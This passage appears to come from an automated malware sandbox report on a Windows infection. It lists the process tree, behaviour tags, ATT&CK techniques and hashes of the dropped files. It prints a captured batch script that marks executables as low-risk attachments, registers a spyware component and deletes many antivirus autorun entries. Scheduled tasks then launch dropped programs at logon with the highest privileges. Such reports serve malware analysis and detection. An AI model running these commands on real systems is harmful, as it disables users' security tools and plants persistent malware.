"HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\D01A.exeC:\Users\Admin\AppData\Local\Temp\D01A.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\D01A.exeC:\Users\Admin\AppData\Local\Temp\D01A.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\D4FD.exeC:\Users\Admin\AppData\Local\Temp\D4FD.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 7762⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 8482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 8802⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 7762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D78E.exeC:\Users\Admin\AppData\Local\Temp\D78E.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\DCEE.exeC:\Users\Admin\AppData\Local\Temp\DCEE.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fsucenter" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_043303\fsucenter.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\twain_32\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Documents and Settings\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fsucenter" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_043241\fsucenter.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Runtimebroker.exeMD5
4982f571dc2169b180285b5b30ac5679
SHA1a312adfd6c0ff33d0dc83a00fa599a0cb6303d86
SHA256d785786f4a52b9631b725abc1184e1f3814feeade38c7ac342d70f0b5ed4b3cb
SHA5129919fc242a94cd8cc9c0a33de91f44f3641d7c2e5fc88ad6ec4040e4110e7a28f59dac32a19547f0767f247ee40dde62bfc58c0bce7b12fbc19c491e3601c4df
-
C:\ProgramData\Runtimebroker.exeMD5
4982f571dc2169b180285b5b30ac5679
SHA1a312adfd6c0ff33d0dc83a00fa599a0cb6303d86
SHA256d785786f4a52b9631b725abc1184e1f3814feeade38c7ac342d70f0b5ed4b3cb
SHA5129919fc242a94cd8cc9c0a33de91f44f3641d7c2e5fc88ad6ec4040e4110e7a28f59dac32a19547f0767f247ee40dde62bfc58c0bce7b12fbc19c491e3601c4df
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.jsonMD5
a285ac140c8c6806223bfdc02302173e
SHA106ca61cae058c568860858e49615d04dc4a8820d
SHA25636d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
c558fdaa3884f969f1ec904ae7bbd991
SHA1b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA2563e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA5126523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
4af92c84bcce0ceb0c0ab166eec42a56
SHA139884ef7fb2aa6ce97d3cfefdf4010c6eb24f957
SHA256e2ace8c01bf5755d3453413e580f7977439d63b9b047e63d720e16aed46e87ce
SHA51216c87b13873a70b755b65bc83e2a9f0ae90451fbe66e5eef6bf8d84db951929b73d73b9fcbddd7f527e55c7f6eb78488f5bd2e1a6ae4352034d64910bc4ee207
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
053e9509c5bd7c10c0236eef7d40a3c3
SHA195eaf66faa68a07115818b43d3666d2ce86c2df3
SHA256188e797d5536e482ef84cd179bb922a5b6aa2277f011fa74b8fd3321d1ba59c0
SHA5126e5bc178416cd7df5c9f550c061ba98cf81012a19c20670d206621ffd3533a7a0d67c8113387cb5cf335e86859f920aa212d3aa494f26bc6b663255a0ad38be7
-
C:\Users\Admin\AppData\Local\Temp\BCCE.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\BCCE.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\BCCE.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\C858.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\C858.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\CCDD.exeMD5
4982f571dc2169b180285b5b30ac5679
SHA1a312adfd6c0ff33d0dc83a00fa599a0cb6303d86
SHA256d785786f4a52b9631b725abc1184e1f3814feeade38c7ac342d70f0b5ed4b3cb
SHA5129919fc242a94cd8cc9c0a33de91f44f3641d7c2e5fc88ad6ec4040e4110e7a28f59dac32a19547f0767f247ee40dde62bfc58c0bce7b12fbc19c491e3601c4df
-
C:\Users\Admin\AppData\Local\Temp\CCDD.exeMD5
4982f571dc2169b180285b5b30ac5679
SHA1a312adfd6c0ff33d0dc83a00fa599a0cb6303d86
SHA256d785786f4a52b9631b725abc1184e1f3814feeade38c7ac342d70f0b5ed4b3cb
SHA5129919fc242a94cd8cc9c0a33de91f44f3641d7c2e5fc88ad6ec4040e4110e7a28f59dac32a19547f0767f247ee40dde62bfc58c0bce7b12fbc19c491e3601c4df
-
C:\Users\Admin\AppData\Local\Temp\D01A.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\D01A.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
